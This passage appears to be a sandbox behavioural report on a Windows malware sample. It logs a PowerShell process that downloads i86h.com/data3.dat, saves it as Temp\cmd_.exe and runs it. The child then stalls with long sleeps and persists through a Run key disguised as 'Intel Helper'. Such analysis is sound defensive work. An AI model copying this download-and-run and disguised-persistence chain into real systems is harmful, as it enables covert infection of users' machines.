| Environment | Get Environment String | name = PATH |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Program Files\Microsoft Office\Office14\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PATH |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Program Files\Microsoft Office\Office14\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
8 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Write | filename = CONOUT$, size = 79 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 79 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 49 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 16 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 11 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 79 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 12 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 54 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 25 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = temp, result_out = C:\Users\BME1N3~1\AppData\Local\Temp |
|
2 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 45 |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
3 | |
| File | Write | filename = CONOUT$, size = 1 |
|
1 | |
| File | Create | filename = C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe, type = file_type |
|
2 | |
| Socket | Send | flags = NO_FLAG_SET, size = 43, size_out = 43 |
|
1 | |
| Inet | Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = i86h.com, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /data3.dat |
|
1 | |
| Inet | Send HTTP Request | headers = host: i86h.com, url = i86h.com/data3.dat |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 4096 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3204 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 3204 |
|
1 | |
| File | Write | filename = C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 7300 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 7300 |
|
1 | |
| File | Write | filename = C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe, size = 6199 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 32120 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 32120 |
|
1 | |
| File | Write | filename = C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe, size = 32120 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 57537, size_out = 14600 |
|
1 | |
| Inet | Read Response | size = 57537, size_out = 14600 |
|
1 | |
| File | Write | filename = C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe, size = 14600 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 42937, size_out = 1460 |
|
1 | |
| Inet | Read Response | size = 42937, size_out = 1460 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 41477, size_out = 10220 |
|
1 | |
| Inet | Read Response | size = 41477, size_out = 10220 |
|
1 | |
| File | Write | filename = C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe, size = 7584 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 31257, size_out = 5840 |
|
1 | |
| Inet | Read Response | size = 31257, size_out = 5840 |
|
1 | |
| File | Write | filename = C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe, size = 5840 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 25417, size_out = 25417 |
|
1 | |
| Inet | Read Response | size = 25417, size_out = 25417 |
|
1 | |
| File | Write | filename = C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe, size = 25417 |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Get Info | filename = C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Get Info | filename = C:\Users\BMe1N39jU1 6criBQ\Documents, type = file_attributes |
|
2 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 |
Thread 0xb9c
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Process | Create | process_name = C:\Users\BME1N3~1\AppData\Local\Temp\cmd_.exe, show_window = SW_SHOWNORMAL |
|
1 |
Process #5: cmd_.exe
39
6
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\bme1n3~1\appdata\local\temp\cmd_.exe |
| Command Line | "C:\Users\BME1N3~1\AppData\Local\Temp\cmd_.exe" |
| Initial Working Directory | C:\Users\BMe1N39jU1 6criBQ\Documents\ |
| Monitor | Start Time: 00:01:18, Reason: Child Process |
| Unmonitor | End Time: 00:01:52, Reason: Self Terminated |
| Monitor Duration | 00:00:34 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xba0 |
| Parent PID | 0xab4 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | O5ZINUQXJZK\BMe1N39jU1 6criBQ |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BA4
0x
C34
0x
C44
0x
C48
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00076fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00190000 | 0x001f6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000200000 | 0x00200000 | 0x002c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| rsaenh.dll | 0x002d0000 | 0x0030bfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x00570fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00640000 | 0x0090efff | Memory Mapped File | r |
|
|
|
- |
| cmd_.exe | 0x00920000 | 0x0093ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x0153ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001540000 | 0x01540000 | 0x0173ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000015e0000 | 0x015e0000 | 0x016dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001700000 | 0x01700000 | 0x0173ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x01740000 | 0x017fffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000001800000 | 0x01800000 | 0x0197ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001980000 | 0x01980000 | 0x01adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001b80000 | 0x01b80000 | 0x01c7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ca0000 | 0x01ca0000 | 0x01d9ffff | Private Memory | rw |
|
|
|
- |
| webio.dll | 0x6fb70000 | 0x6fbbefff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x6fbc0000 | 0x6fc17fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x70150000 | 0x70155fff | Memory Mapped File | rwx |
|
|
|
- |
| wshqos.dll | 0x71e10000 | 0x71e15fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x73d20000 | 0x73d31fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x73d60000 | 0x73d97fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x73e70000 | 0x73e76fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x73e80000 | 0x73e9bfff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x74a70000 | 0x74a74fff | Memory Mapped File | rwx |
|
|
|
- |
| credssp.dll | 0x74c30000 | 0x74c37fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x74d00000 | 0x74d3afff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x74de0000 | 0x74e23fff | Memory Mapped File | rwx |
|
|
|
- |
| wship6.dll | 0x74f10000 | 0x74f15fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x74f20000 | 0x74f5bfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x74f60000 | 0x74f75fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x753c0000 | 0x753dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x753e0000 | 0x753ebfff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75500000 | 0x7550bfff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75510000 | 0x7562cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75630000 | 0x75679fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75790000 | 0x757e6fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75800000 | 0x75809fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75810000 | 0x758b0fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x758c0000 | 0x759f5fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75a00000 | 0x75ac8fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75ad0000 | 0x75aeefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75b50000 | 0x75b9dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75ba0000 | 0x75c73fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75d10000 | 0x75dbbfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75e10000 | 0x75e28fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e30000 | 0x75efbfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x75f00000 | 0x75f34fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75f40000 | 0x76b89fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x76b90000 | 0x76d8afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76d90000 | 0x76eebfff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x76ef0000 | 0x76f8cfff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x76f90000 | 0x77084fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x772b0000 | 0x7733efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77340000 | 0x7747bfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77480000 | 0x77485fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x774d0000 | 0x7756ffff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77580000 | 0x77580fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Threads
Thread 0xba4
39
6
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-08-10 12:37:59 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 140432 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x75ba0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x75bf418d |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x75bf1e16 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x75bf76e6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsFree, address_out = 0x75bf1f61 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x75ba0000 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Filename | process_name = c:\users\bme1n3~1\appdata\local\temp\cmd_.exe, file_name_orig = C:\Users\BME1N3~1\AppData\Local\Temp\cmd_.exe, size = 260 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x774d0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6fbc0000 |
|
1 | |
| Module | Load | module_name = Iphlpapi.dll, base_address = 0x73e80000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x75f40000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x758c0000 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-08-10 12:37:59 (UTC) |
|
1 | |
| System | Sleep | duration = 120000 milliseconds (120.000 seconds) |
|
1 | |
| System | Get Time | type = System Time, time = 2018-08-10 12:38:09 (UTC) |
|
1 | |
| Module | Get Filename | process_name = c:\users\bme1n3~1\appdata\local\temp\cmd_.exe, file_name_orig = C:\Users\BME1N3~1\AppData\Local\Temp\cmd_.exe, size = 259 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = Intel Helper, data = C:\Users\BME1N3~1\AppData\Local\Temp\cmd_.exe -a, size = 98, type = REG_SZ |
|
1 | |
| System | Get Time | type = System Time, time = 2018-08-10 12:38:09 (UTC) |
|
1 | |
| System | Sleep | duration = 120000 milliseconds (120.000 seconds) |
|
1 | |
| System | Get Time | type = System Time, time = 1627-02-06 23:17:30 (UTC) |
|
1 | |
| Module | Get Filename | process_name = c:\users\bme1n3~1\appdata\local\temp\cmd_.exe, file_name_orig = C:\Users\BME1N3~1\AppData\Local\Temp\cmd_.exe, size = 260 |
|
1 | |
| File | Create | filename = C:\Users\BMe1N39jU1 6criBQ\AppData\Roaming\Intel\Sign.bin, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| System | Get Time | type = Ticks, time = 160525 |
|
2 | |
| System | Get Computer Name | result_out = o5zInUQXjZk, type = ComputerNameDnsHostname |
|
1 | |
| System | Get Time | type = System Time, time = 1627-02-06 23:17:30 (UTC) |
|
1 | |
| System | Sleep | duration = 300000 milliseconds (300.000 seconds) |
|
1 | |
| System | Get Time | type = System Time, time = 1627-02-06 23:17:40 (UTC) |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC |
|
1 | |
| Inet | Open Connection | server_name = www.download.windowsupdate.com, server_port = 0 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /msdownload/update/v3/static/trustedr/en/authrootseq.txt, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE |
|
1 | |
| Inet | Send HTTP Request | headers = Content-Type: application/x-www-form-urlencoded, url = www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| System | Sleep | duration = 5000 milliseconds (5.000 seconds) |
|
1 |
Process #6: cmd_.exe
164
81
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\bme1n39ju1 6cribq\appdata\local\temp\cmd_.exe |
| Command Line | "C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe" -a |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:00, Reason: Autostart |
| Unmonitor | End Time: 00:04:33, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:33 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x138 |
| Parent PID | 0x680 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | O5ZINUQXJZK\BMe1N39jU1 6criBQ |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
214
0x
350
0x
7AC
0x
7A8
0x
778
0x
6A4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
